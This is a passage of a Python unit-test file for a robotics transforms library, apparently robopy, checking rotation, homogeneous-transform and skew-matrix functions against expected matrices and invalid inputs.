received_mat = transforms.troty(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 0., -1., 0.], [0., 1., 0., 0.], [1., 0., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., -0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., -0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., 0., 1., 0.], [0., 1., 0., 0.], [-1., 0., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 0., -1., 0.], [0., 1., 0., 0.], [1., 0., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., 0., 1., 0.], [0., 1., 0., 0.], [-1., 0., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.troty, 'invalid', unit='deg')
def test_transforms_3d_troty_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.troty,
180, unit='invalid unit')
def test_transforms_3d_troty_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.troty, 180, unit=True)
def test_transforms_3d_troty_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.troty, 180, unit=5)
# trotz | complete
class Testtrotz(unittest.TestCase):
def test_transforms_3d_trotz_validData_returnDatatype(self):
self.assertIsInstance(transforms.trotz(0), np.matrix)
def test_transforms_3d_trotz_validData_returnData_dimension(self):
dimensions = transforms.trotz(0).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_3d_trotz_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., -0., 0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., -1., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., -0., 0., 0.], [0., -1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 1., 0., 0.], [-1., -0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [-0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., -0., 0., 0.], [0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [-0., 1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., -1., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., -0., 0., 0.], [0., -1., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 1., 0., 0.], [-1., -0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., -1., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotz(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotz_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.trotz, 'invalid', unit='deg')
def test_transforms_3d_trotz_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.trotz,
180, unit='invalid unit')
def test_transforms_3d_trotz_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.trotz, 180, unit=True)
def test_transforms_3d_trotz_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.trotz, 180, unit=5)
# r2t
class TestR2t(unittest.TestCase):
def test_transforms_r2t_validData_returnDatatype(self): # pass
self.assertIsInstance(transforms.r2t(transforms.rotx(0)), np.matrix)
def test_transforms_r2t_validData_returnData_dimension(self): # pass
dimensions = transforms.r2t(transforms.rotx(0)).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_r2t_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., -0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.r2t(transforms.rotx(0))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_r2t_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.r2t(transforms.rotx(pi / 2))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# t2r
class TestT2r(unittest.TestCase):
def test_transforms_t2r_validData_returnDatatype(self): # pass
self.assertIsInstance(transforms.t2r(transforms.trotx(0)), np.matrix)
def test_transforms_t2r_validData_returnData_dimension(self): # pass
dimensions = transforms.t2r(transforms.trotx(0)).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_t2r_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, -0], [0, 0, 1]])
received_mat = transforms.t2r(transforms.trotx(0))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_t2r_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0.]])
received_mat = transforms.t2r(transforms.trotx(pi / 2))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
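# For context, hedged sketches (hypothetical, not robopy's source) of the two
# conversions exercised above: r2t embeds a 3x3 rotation in a 4x4 homogeneous
# transform with zero translation, and t2r extracts the rotation block back.
def r2t_sketch(R):
    T = np.asmatrix(np.eye(4))
    T[0:3, 0:3] = R
    return T

def t2r_sketch(T):
    return T[0:3, 0:3]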
# # rpy2r | ready
# class TestRpy2r(unittest.TestCase):
# def test_transforms_rpy2r_validData_returnDatatype(self): # pass
# self.assertIsInstance(transforms.rpy2r([[11, 1, 1]]), np.matrix)
# oa2tr
class TestOa2tr(unittest.TestCase):
def test_transforms_oa2tr_validData_returnDatatype(self): # pass
self.assertIsInstance(transforms.oa2tr([[1, 0, 1]], [[1, 1, 1]]), np.matrix)
# to test:
# tr2rt
# rt2tr
# trlog
# trexp
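# Of the functions listed above, the tr2rt/rt2tr pair is simple enough to
# sketch here (hypothetical, not robopy's source): tr2rt splits a homogeneous
# transform into rotation and translation; rt2tr reassembles them.
def tr2rt_sketch(T):
    return T[0:3, 0:3], T[0:3, 3]

def rt2tr_sketch(R, t):
    T = np.asmatrix(np.eye(4))
    T[0:3, 0:3] = R
    T[0:3, 3] = t
    return T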
# ---------------------------------------------------------------------------------------#
# 2D Transforms
# ---------------------------------------------------------------------------------------#
# rot2
class Testrot2(unittest.TestCase):
def test_transforms_2d_rot2_validData_returnDatatype(self):
self.assertIsInstance(transforms.rot2(0), np.matrix)
def test_transforms_2d_rot2_validData_returnData_dimension(self):
dimensions = transforms.rot2(0).shape
self.assertEqual(dimensions, (2, 2))
def test_transforms_2d_rot2_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0], [0, 1]])
received_mat = transforms.rot2(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0, -1, ], [1, 0]])
received_mat = transforms.rot2(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1, -0, ], [0, -1]])
received_mat = transforms.rot2(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0, 1, ], [-1, -0]])
received_mat = transforms.rot2(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1, 0, ], [-0, 1]])
received_mat = transforms.rot2(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, -0, ], [0, 1]])
received_mat = transforms.rot2(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, ], [-0, 1]])
received_mat = transforms.rot2(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0, -1, ], [1, 0]])
received_mat = transforms.rot2(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1, -0, ], [0, -1]])
received_mat = transforms.rot2(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0, 1, ], [-1, -0]])
received_mat = transforms.rot2(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0, -1, ], [1, 0]])
received_mat = transforms.rot2(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_rot2_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.rot2, 'invalid', unit='deg')
def test_transforms_2d_rot2_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.rot2,
180, unit='invalid unit')
def test_transforms_2d_rot2_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.rot2, 180, unit=True)
def test_transforms_2d_rot2_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.rot2, 180, unit=5)
# trot2
class Testtrot2(unittest.TestCase):
def test_transforms_2d_trot2_validData_returnDatatype(self):
self.assertIsInstance(transforms.trot2(0), np.matrix)
def test_transforms_2d_trot2_validData_returnData_dimension(self):
dimensions = transforms.trot2(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_2d_trot2_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., -0., 0.], [0., 1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., -1., 0.], [1., 0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., -0., 0.], [0., -1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1., -0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0.], [-0., 1., 0.], [0, 0, 1]])
received_mat = transforms.trot2(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., -0., 0.], [0., 1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., 0.], [-0., 1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1., 0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., -0., 0.], [0., -1., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1., -0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1., 0., 0.], [0., 0., 1.]])
received_mat = transforms.trot2(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_2d_trot2_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.trot2, 'invalid', unit='deg')
def test_transforms_2d_trot2_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.trot2,
180, unit='invalid unit')
def test_transforms_2d_trot2_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.trot2, 180, unit=True)
def test_transforms_2d_trot2_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.trot2, 180, unit=5)
# trexp2
class Testtrexp2(unittest.TestCase):
def test_transforms_2d_trexp2_validData_returnDatatype(self):
self.assertIsInstance(transforms.trexp2(transforms.rot2(10)), np.matrix)
# ---------------------------------------------------------------------------------------#
# Differential Motion
# ---------------------------------------------------------------------------------------#
# skew
class TestSkew(unittest.TestCase):
# Tests for a size-1 (scalar) input vector
# Ensure a matrix is returned
def test_transforms_dif_skew_validData_returnDatatype(self):
self.assertIsInstance(transforms.skew(np.matrix([1])), np.matrix)
# Check Matrix Dimensions vectorsize=1
def test_transforms_dif_skew_validData_returnData_dimension(self):
dimensions = transforms.skew(np.matrix([1])).shape
self.assertEqual(dimensions, (2, 2))
# Tests for a 3-vector input
# Ensure a matrix is returned
def test_transforms_dif_skew_validData_returnDatatype_v3(self):
self.assertIsInstance(transforms.skew(np.matrix([1, 1, 1])), np.matrix)
# Check Matrix Dimensions vectorsize=3
def test_transforms_dif_skew_validData_returnData_dimension_v3(self):
dimensions = transforms.skew(np.matrix([1, 1, 1])).shape
self.assertEqual(dimensions, (3, 3))
# boundary tests for vector size of 1
def test_transforms_dif_skew_validData_boundaryCondition_1(self):
expected_mat = np.matrix([[0, -1], [1, 0]])
received_mat = transforms.skew(np.matrix([1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_2(self):
expected_mat = np.matrix([[0, -2], [2, 0]])
received_mat = transforms.skew(np.matrix([2]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_3(self):
expected_mat = np.matrix([[0, -3], [3, 0]])
received_mat = transforms.skew(np.matrix([3]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_4(self):
expected_mat = np.matrix([[0, -4], [4, 0]])
received_mat = transforms.skew(np.matrix([4]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_5(self):
expected_mat = np.matrix([[0, -5], [5, 0]])
received_mat = transforms.skew(np.matrix([5]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# boundary tests for a 3-vector
def test_transforms_dif_skew_validData_boundaryCondition_111(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, -1], [-1, 1, 0]])
received_mat = transforms.skew(np.matrix([1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_101(self):
expected_mat = np.matrix([[0, -1, 0], [1, 0, -1], [0, 1, 0]])
received_mat = transforms.skew(np.matrix([1, 0, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_100(self):
expected_mat = np.matrix([[0, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.skew(np.matrix([1, 0, 0]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skew_validData_boundaryCondition_321(self):
expected_mat = np.matrix([[0, -1, 2], [1, 0, -3], [-2, 3, 0]])
received_mat = transforms.skew(np.matrix([3, 2, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
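# A hedged reference sketch (hypothetical, not robopy's source) of skew,
# consistent with the expected matrices above: a scalar s maps to the 2x2
# so(2) generator [[0, -s], [s, 0]]; a 3-vector [x, y, z] maps to the 3x3
# so(3) cross-product matrix.
def skew_sketch(v):
    v = np.asarray(v).flatten()
    if v.size == 1:
        s = v[0]
        return np.matrix([[0, -s], [s, 0]])
    x, y, z = v
    return np.matrix([[0, -z, y],
                      [z, 0, -x],
                      [-y, x, 0]])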
# skewa
class TestSkewa(unittest.TestCase):
# Tests for a 3x1 input vector
# Ensure a matrix is returned
def test_transforms_dif_skewa_validData_returnDatatype(self):
self.assertIsInstance(transforms.skewa(np.matrix([1, 1, 1])), np.matrix)
# Check Matrix Dimensions vectorsize=3x1
def test_transforms_dif_skewa_validData_returnData_dimension(self):
dimensions = transforms.skewa(np.matrix([1, 1, 1])).shape
self.assertEqual(dimensions, (3, 3))
# Tests for a 6x1 input vector
# Ensure a matrix is returned
def test_transforms_dif_skewa_validData_returnDatatype_6x1(self):
self.assertIsInstance(transforms.skewa(np.matrix([1, 1, 1, 1, 1, 1])), np.matrix)
# Check Matrix Dimensions of 4x4 if v = 6x1
def test_transforms_dif_skewa_validData_returnData_dimension_6x1(self):
dimensions = transforms.skewa(np.matrix([1, 1, 1, 1, 1, 1])).shape
self.assertEqual(dimensions, (4, 4))
# boundary tests for a 3-vector input
def test_transforms_dif_skewa_validData_boundaryCondition_1(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, 1], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_2(self):
expected_mat = np.matrix([[0, -3, 1], [3, 0, 2], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 2, 3]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# Disabled stub: the expected/received values are placeholders, so the whole
# body stays commented out (live assertion lines at class scope would raise
# NameError when the class body executes).
# def test_transforms_dif_skewa_validData_boundaryCondition_2_6x1(self):
#     expected_mat = np.matrix([[1, 0], [0, 1]])
#     received_mat = transforms.skewa(np.matrix([]))
#     if not matrices_equal(received_mat, expected_mat, ):
#         output_str = matrix_mismatch_string_builder(
#             expected_mat, received_mat)
#         self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_2_4x4(self):
expected_mat = np.matrix([[0, -1, 1, 1], [1, 0, -1, 0], [-1, 1, 0, 1], [0, 0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 0, 1, 1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
# boundary tests for a 3-vector
def test_transforms_dif_skewa_validData_boundaryCondition_111(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, 1], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 1, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_101(self):
expected_mat = np.matrix([[0, -1, 1], [1, 0, 0], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 0, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_100(self):
expected_mat = np.matrix([[0, 0, 1], [0, 0, 0], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 0, 0]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_123(self):
expected_mat = np.matrix([[0, -3, 1], [3, 0, 2], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([1, 2, 3]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_dif_skewa_validData_boundaryCondition_321(self):
expected_mat = np.matrix([[0, -1, 3], [1, 0, 2], [0, 0, 0]])
received_mat = transforms.skewa(np.matrix([3, 2, 1]))
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
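# A hedged sketch (hypothetical) of skewa, matching the expectations above
# and reusing skew_sketch from earlier: a 3-vector [x, y, w] maps to the 3x3
# se(2) generator; a 6-vector [vx, vy, vz, wx, wy, wz] maps to the 4x4 se(3)
# generator with the angular part in the top-left block.
def skewa_sketch(v):
    v = np.asarray(v).flatten()
    if v.size == 3:
        x, y, w = v
        return np.matrix([[0, -w, x],
                          [w, 0, y],
                          [0, 0, 0]])
    T = np.asmatrix(np.zeros((4, 4)))
    T[0:3, 0:3] = skew_sketch(v[3:6])
    T[0:3, 3] = np.matrix(v[0:3]).T
    return T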
# vex
class TestVex(unittest.TestCase):
# test for 3x3 matrix
def test_transforms_dif_vex_validData_returnDatatype1(self):
self.assertIsInstance(transforms.vex(transforms.rotx(30)), np.matrix)
# ensure a 3x1 vector is returned if the input matrix is 3x3
def test_transforms_dif_vex_validData_returnData_dimension1(self):
dimensions = transforms.vex(transforms.rotx(30)).shape
self.assertEqual(dimensions, (3, 1))
def test_transforms_dif_vex_validData_returnDatatype2(self):
